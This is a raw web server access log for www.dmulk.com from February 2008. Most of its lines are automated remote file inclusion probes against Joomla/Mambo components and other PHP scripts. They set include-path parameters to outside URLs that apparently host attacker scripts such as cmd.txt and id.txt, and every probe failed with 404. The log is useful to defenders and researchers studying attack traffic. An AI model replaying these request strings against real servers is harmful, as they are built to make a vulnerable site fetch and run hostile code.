85.88.23.149 - - [12/Feb/2008:10:01:15 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:10:01:16 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [12/Feb/2008:10:02:40 -0800] "GET /logs/access_080101.log/index.php?redir=http://ecology.t35.com/Scans/safevenom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:10:02:43 -0800] "GET /logs/access_071224.log/main.php?p=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:03:37 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:03:37 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:10:04:45 -0800] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:10:04:46 -0800] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:10:05:43 -0800] "GET /main.php?p=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.223.100 - - [12/Feb/2008:10:06:27 -0800] "GET /index.php?site1=http://www.freewebtown.com/shadowad/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.223.100 - - [12/Feb/2008:10:06:27 -0800] "GET /logs/index.php?site1=http://www.freewebtown.com/shadowad/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.29.0.28 - - [12/Feb/2008:10:06:34 -0800] "GET /logs/access_071230.log/convert/mvcw.php?step=1&vwar_root=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.0.28 - - [12/Feb/2008:10:06:34 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.220 - - [12/Feb/2008:10:08:14 -0800] "GET /logs/access_080117.log/book.php5?page=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.220 - - [12/Feb/2008:10:08:15 -0800] "GET /logs/book.php5?page=http://vps.istri.info/~vpsistri/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:08:16 -0800] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:08:16 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.109.69 - - [12/Feb/2008:10:08:17 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:09:09 -0800] "GET /logs/access_080103.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:09:10 -0800] "GET //components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:09:10 -0800] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:09:10 -0800] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:09:11 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.71.158 - - [12/Feb/2008:10:09:11 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://php.free.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:09:15 -0800] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:09:18 -0800] "GET /logs/access_080103.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:09:19 -0800] "GET //components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:09:19 -0800] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.88.23.149 - - [12/Feb/2008:10:09:46 -0800] "GET /logs/access_071230.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:10:11:00 -0800] "GET /logs/index1.php?=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:10:11:00 -0800] "GET /index1.php?=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:10:11:44 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:10:11:45 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.143 - - [12/Feb/2008:10:12:20 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:13:39 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:13:40 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:13:41 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.230.99 - - [12/Feb/2008:10:15:01 -0800] "GET /logs/index.php?site1=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.230.99 - - [12/Feb/2008:10:15:02 -0800] "GET /index.php?site1=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:15:33 -0800] "GET /logs/access.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:15:34 -0800] "GET /logs/access.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.244 - - [12/Feb/2008:10:15:37 -0800] "GET /logs/access.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.moe.go.th/bic/fileadmin/.md/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
165.138.51.117 - - [12/Feb/2008:10:16:34 -0800] "GET /logs/access_080108.log//index.php?seccion=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.117 - - [12/Feb/2008:10:16:35 -0800] "GET //index.php?seccion=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
165.138.51.117 - - [12/Feb/2008:10:16:35 -0800] "GET /logs//index.php?seccion=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:10:17:05 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:10:17:05 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
85.128.162.2 - - [12/Feb/2008:10:19:09 -0800] "GET /logs/access_080108.log//index.php?seccion=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.128.162.2 - - [12/Feb/2008:10:19:09 -0800] "GET //index.php?seccion=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.128.162.2 - - [12/Feb/2008:10:19:10 -0800] "GET /logs//index.php?seccion=http://sbn.poilpark.net/docu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:19:12 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:19:13 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:19:19 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:19:31 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:19:31 -0800] "GET /modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:19:32 -0800] "GET /logs/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:19:41 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:10:20:23 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:10:20:23 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:10:20:24 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:10:20:31 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [12/Feb/2008:10:23:24 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [12/Feb/2008:10:23:24 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [12/Feb/2008:10:23:25 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [12/Feb/2008:10:23:34 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [12/Feb/2008:10:23:34 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [12/Feb/2008:10:23:35 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.222.131.228 - - [12/Feb/2008:10:24:51 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
71.222.131.228 - - [12/Feb/2008:10:25:02 -0800] "GET / HTTP/1.0" 200 2946 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
71.222.131.228 - - [12/Feb/2008:10:25:23 -0800] "GET /tools/ HTTP/1.0" 200 12388 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
71.222.131.228 - - [12/Feb/2008:10:25:24 -0800] "GET /tools/css/phpmyadmin.css.php?lang=en&js_frame=right&js_isDOM=1 HTTP/1.0" 200 12240 "http://www.dmulk.com/tools/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
71.222.131.228 - - [12/Feb/2008:10:25:24 -0800] "GET /tools/themes/original/img/vertical_line.png HTTP/1.0" 200 83 "http://www.dmulk.com/tools/css/phpmyadmin.css.php?lang=en&js_frame=right&js_isDOM=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
71.222.131.228 - - [12/Feb/2008:10:25:24 -0800] "GET /tools/themes/original/img/logo_right.png HTTP/1.0" 200 5658 "http://www.dmulk.com/tools/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:10:25:48 -0800] "GET /logs/access_071116.log/main.php?p=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:10:25:49 -0800] "GET /logs/main.php?p=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:10:29:44 -0800] "GET /logs/access_080108.log//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:10:29:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:10:29:45 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:10:29:46 -0800] "GET /logs/access_071224.log/main.php?p=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:10:30:16 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:10:30:21 -0800] "GET /ipblock.inc.php?path_escape=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:10:30:22 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:10:30:33 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:10:30:34 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:10:33:02 -0800] "GET /logs/access_080121.log/myevent.php?myevent_path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:10:33:03 -0800] "GET /myevent.php?myevent_path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [12/Feb/2008:10:33:03 -0800] "GET /logs/myevent.php?myevent_path=http://sjyphoto.com/zboard/data/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.71 - - [12/Feb/2008:10:33:34 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:10:33:40 -0800] "GET /logs/access_071230.log//admin/admin.php?vwar_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:10:33:40 -0800] "GET /logs/access_071230.log//admin/admin.php?vwar_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:10:33:40 -0800] "GET //admin/admin.php?vwar_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:10:33:40 -0800] "GET //admin/admin.php?vwar_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:10:33:40 -0800] "GET /logs//admin/admin.php?vwar_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:10:33:40 -0800] "GET /logs//admin/admin.php?vwar_root=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.245.244.82 - - [12/Feb/2008:10:34:47 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.172.150.27 - - [12/Feb/2008:10:34:57 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:10:36:07 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:10:36:07 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:10:36:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:10:36:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:10:36:54 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.110.26 - - [12/Feb/2008:10:36:54 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.200 - - [12/Feb/2008:10:37:00 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:10:37:13 -0800] "GET /logs/access_080108.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:10:37:14 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:10:37:35 -0800] "GET /logs/access_080131.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.159.44 - - [12/Feb/2008:10:38:14 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.wvcorrectionalindustries.com/phpdig/admin/temp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.144 - - [12/Feb/2008:10:39:13 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.199.102.117 - - [12/Feb/2008:10:39:29 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [12/Feb/2008:10:39:30 -0800] "GET /administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [12/Feb/2008:10:39:30 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?&mosConfig_absolute_path=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
